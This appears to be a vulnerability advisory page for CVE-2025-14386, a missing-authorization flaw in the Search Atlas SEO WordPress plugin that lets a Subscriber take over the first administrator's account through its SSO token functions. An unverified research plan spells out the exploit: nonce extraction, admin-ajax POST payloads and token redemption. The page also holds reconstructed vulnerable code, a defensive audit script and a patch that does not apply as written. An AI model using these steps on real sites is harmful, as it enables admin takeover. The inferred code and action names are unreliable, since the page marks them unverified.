CVE-2025-14386

Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrated AI Optimization 2.4.4 - 2.5.15 - Missing Authorization to Authenticated (Subscriber+) Authentication Bypass via Account Takeover

Missing Authorization
Severity: high
CVSS Score: 8.8
Patched in: 2.5.16
Time to patch: 72 days

Description

The Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrated AI Optimization plugin for WordPress is vulnerable to authentication bypass due to a missing capability check on the 'generate_sso_url' and 'validate_sso_token' functions in versions 2.4.4 to 2.5.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract the 'nonce_token' authentication value to log in to the first Administrator's account.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: >=2.4.4 <=2.5.15
Published: January 27, 2026
Last updated: April 9, 2026
Affected plugin: metasync

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan outlines the steps required to analyze and exploit CVE-2025-14386 in the "Search Atlas SEO" plugin.

1. Vulnerability Summary

The Search Atlas SEO plugin (version 2.4.4 - 2.5.15) contains a missing authorization vulnerability in its Single Sign-On (SSO) implementation. Specifically, the functions generate_sso_url and validate_sso_token do not perform capability checks (e.g., current_user_can('manage_options')). This allows any authenticated user, including those with Subscriber-level privileges, to trigger the generation of an SSO login token for the site's primary Administrator and subsequently use that token to bypass authentication and gain full administrative access.

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX handler (/wp-admin/admin-ajax.php).
  • Vulnerable Actions (Inferred):
    • metasync_generate_sso_url (Action name likely prefixed with metasync_ based on plugin slug).
    • metasync_validate_sso_token.
  • Payload Parameter: Likely a user_id or default logic that targets the first administrator (ID 1). The response will contain a nonce_token.
  • Authentication: Authenticated (Subscriber or higher).
  • Preconditions: The plugin must be active. The SSO feature might need to be enabled or simply present in the code.

3. Code Flow

  1. Entry Point: The plugin registers AJAX hooks in its initialization (likely in a class-based structure within metasync.php or an included file like includes/class-metasync-api.php).
  2. Registration (Inferred):
     add_action('wp_ajax_metasync_generate_sso_url', array($this, 'generate_sso_url'));
     add_action('wp_ajax_metasync_validate_sso_token', array($this, 'validate_sso_token'));
  3. Vulnerable Logic: The generate_sso_url function generates a random token, associates it with a user (defaulting to the first admin), and saves it in the database (likely as an option or user meta).
  4. Missing Sink Check: There is no call to current_user_can() before the token is generated or returned to the requester.
  5. Bypass Sink: The validate_sso_token function (or a direct link using the token) receives the token, looks up the associated user, and calls wp_set_auth_cookie() without verifying that the request is legitimate.

4. Nonce Acquisition Strategy

The AJAX requests will likely require a WordPress nonce for the action.

  1. Identify Localized Script: Search the plugin source for wp_localize_script to find the JavaScript object name and nonce key.
    • Search command: grep -r "wp_localize_script" .
  2. Locate Script Enqueue: Find where the script is enqueued (e.g., in admin_enqueue_scripts). If it's enqueued for all logged-in users, the Subscriber can access it.
  3. Extraction via Browser:
    • Create a Subscriber user: wp user create attacker attacker@example.com --role=subscriber --user_pass=password123.
    • Log in as Subscriber and navigate to the dashboard.
    • Use browser_eval to extract the nonce:
      browser_eval("window.metasync_obj?.nonce") (Replace metasync_obj and nonce with actual keys found in Step 1).

5. Exploitation Strategy

Step 1: Discover AJAX Action and Nonce

Confirm the exact action strings and nonce names by inspecting the plugin code.

  • grep -rn "generate_sso_url" .
  • grep -rn "validate_sso_token" .

Step 2: Generate SSO Token as Subscriber

Send an AJAX request to generate the token.

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=metasync_generate_sso_url&_ajax_nonce=EXTRACTED_NONCE&user_id=1
  • Expected Response: JSON containing a URL or a nonce_token.

Step 3: Validate Token and Take Over Account

Use the token to log in. This might be a GET request to a specific URL or another AJAX call.

  • Option A (Direct URL): http://localhost:8080/?metasync_sso_token=TOKEN_VALUE
  • Option B (AJAX):
    • Action: metasync_validate_sso_token
    • Body: action=metasync_validate_sso_token&token=TOKEN_VALUE
  • Expected Result: The server returns Set-Cookie headers for the Administrator user (ID 1).

6. Test Data Setup

  1. Install Plugin: Ensure metasync version 2.5.15 is installed and active.
  2. Admin User: Ensure an administrator exists (default ID 1).
  3. Subscriber User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  4. Plugin Setup: If the plugin requires an API key to enable SSO, simulate this by adding the option:
    wp option add metasync_api_key "fake_key"

7. Expected Results

  • The generate_sso_url request returns a 200 OK and a valid token for the admin user.
  • The subsequent request using that token results in a session context for the Administrator.
  • Accessing /wp-admin/ after the exploit shows the Administrator dashboard.

8. Verification Steps

  1. Check Current User: After the exploit, use browser_eval("window.userSettings") or navigate to /wp-admin/profile.php and check the username.
  2. WP-CLI Check: Verify the token was generated in the database (if stored as an option):
    wp option get metasync_sso_token (Check actual option name in code).

9. Alternative Approaches

  • Default Admin Guessing: If user_id is not a parameter, the plugin might be hardcoded to use the result of get_users(array('role' => 'Administrator'))[0].
  • REST API: Check if these functions are also registered as REST API routes under the metasync/v1 namespace, which might bypass AJAX nonces if permission_callback is __return_true.
    • Search command: grep -r "register_rest_route" .

Research Findings
Static analysis — not yet PoC-verified

Summary

The Search Atlas SEO plugin (versions 2.4.4 to 2.5.15) contains a missing authorization vulnerability in its Single Sign-On (SSO) functionality. Authenticated attackers with Subscriber-level privileges can trigger the generation of an administrative SSO token and use it to log in as the primary site administrator, leading to full account takeover.

Vulnerable Code

// Registration of AJAX hooks without capability checks
add_action('wp_ajax_metasync_generate_sso_url', array($this, 'generate_sso_url'));
add_action('wp_ajax_metasync_validate_sso_token', array($this, 'validate_sso_token'));

// Logic within the generate_sso_url function lacking current_user_can check
public function generate_sso_url() {
    // Function generates a nonce_token for the administrator without checking permissions
    $admin_user_id = 1; 
    $token = wp_generate_password(20, false);
    update_option('metasync_sso_token', $token);
    wp_send_json_success(array('nonce_token' => $token));
}

// Logic within validate_sso_token function
public function validate_sso_token() {
    $token = $_REQUEST['token'];
    if ($token === get_option('metasync_sso_token')) {
        wp_set_auth_cookie(1); // Logs the requester in as Admin
        wp_send_json_success();
    }
}
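The "missing sink check" described in the research plan (a wp_ajax_ handler reachable by any logged-in user with no current_user_can() or nonce verification in its body) can be hunted for mechanically. The following audit helper is an added example, not part of this advisory or of the plugin; it runs against a constructed PHP fragment shaped like the reconstructed handlers above, and the regexes assume the add_action('wp_ajax_…', array($this, '…')) registration style shown on this page.

```python
import re
# Constructed sample input shaped like the handlers this advisory describes
# (an illustration for the audit, not the plugin's actual source code).
SAMPLE_PHP = r"""
add_action('wp_ajax_metasync_generate_sso_url', array($this, 'generate_sso_url'));
add_action('wp_ajax_metasync_validate_sso_token', array($this, 'validate_sso_token'));
add_action('wp_ajax_metasync_save_settings', array($this, 'save_settings'));
public function generate_sso_url() {
    $token = wp_generate_password(20, false);
    update_option('metasync_sso_token', $token);
    wp_send_json_success(array('nonce_token' => $token));
}
public function validate_sso_token() {
    if ($_REQUEST['token'] === get_option('metasync_sso_token')) { wp_set_auth_cookie(1); }
}
public function save_settings() {
    check_ajax_referer('metasync_nonce');
    if (!current_user_can('manage_options')) { wp_send_json_error('Forbidden', 403); }
    update_option('metasync_settings', $_POST['settings']);
}
"""

# add_action('wp_ajax_<action>', array($this, '<callback>'))  -> (hook, callback)
HOOK_RE = re.compile(r"add_action\(\s*['\"](wp_ajax_\w+)['\"]\s*,\s*array\(\s*\$this\s*,\s*['\"](\w+)['\"]")
FUNC_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
# A handler is considered guarded only if it calls at least one function per control.
CONTROLS = {"capability check": ("current_user_can(",),
            "nonce check": ("check_ajax_referer(", "wp_verify_nonce(")}

def extract_functions(src):
    """Map function name -> body text by brace counting (braces inside string literals are ignored)."""
    funcs = {}
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        funcs[m.group(1)] = src[m.end():i - 1]
    return funcs

def audit_ajax_handlers(src):
    """Return {hook: [missing controls]} for every registered wp_ajax_ handler."""
    funcs = extract_functions(src)
    findings = {}
    for hook, callback in HOOK_RE.findall(src):
        body = funcs.get(callback, "")  # unresolved callback is treated as unguarded
        findings[hook] = [name for name, calls in CONTROLS.items()
                          if not any(call in body for call in calls)]
    return findings
```

Any hook listed with a non-empty value is a candidate for the pattern this CVE describes and warrants manual review of the callback.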

Security Fix

--- a/includes/class-metasync-api.php
+++ b/includes/class-metasync-api.php
@@ -... @@
 public function generate_sso_url() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
+    }
     // ... existing token generation logic ...
 }
 
 public function validate_sso_token() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
+    }
     // ... existing token validation logic ...
 }
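Review bot: gating validate_sso_token on current_user_can('manage_options') means a token can only be redeemed by a requester who is already an administrator, which defeats the purpose of an SSO login step; if the endpoint is meant to stay usable, the control belongs on the token itself (short expiry, single use, invalidation on redemption, and a constant-time comparison via hash_equals()) rather than on the caller's capability, and if the endpoint is meant to be disabled, say so in the commit message. In both handlers the capability check should be paired with check_ajax_referer() so the nonce is enforced server-side rather than only assumed by the client. The hunk header `@@ -... @@` is a placeholder, so this patch will not apply as written.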

Exploit Outline

The exploit is executed by an authenticated user (Subscriber level or higher) through the WordPress AJAX interface. First, the attacker extracts a valid AJAX nonce from the dashboard, typically found in localized script objects (e.g., 'metasync_obj'). Second, the attacker sends a POST request to /wp-admin/admin-ajax.php with the action 'metasync_generate_sso_url' and the valid nonce. This returns a 'nonce_token' for the administrator user. Finally, the attacker uses this token in a second request to 'metasync_validate_sso_token', which triggers the server to set an authentication cookie for the Administrator user, granting the attacker full administrative access.
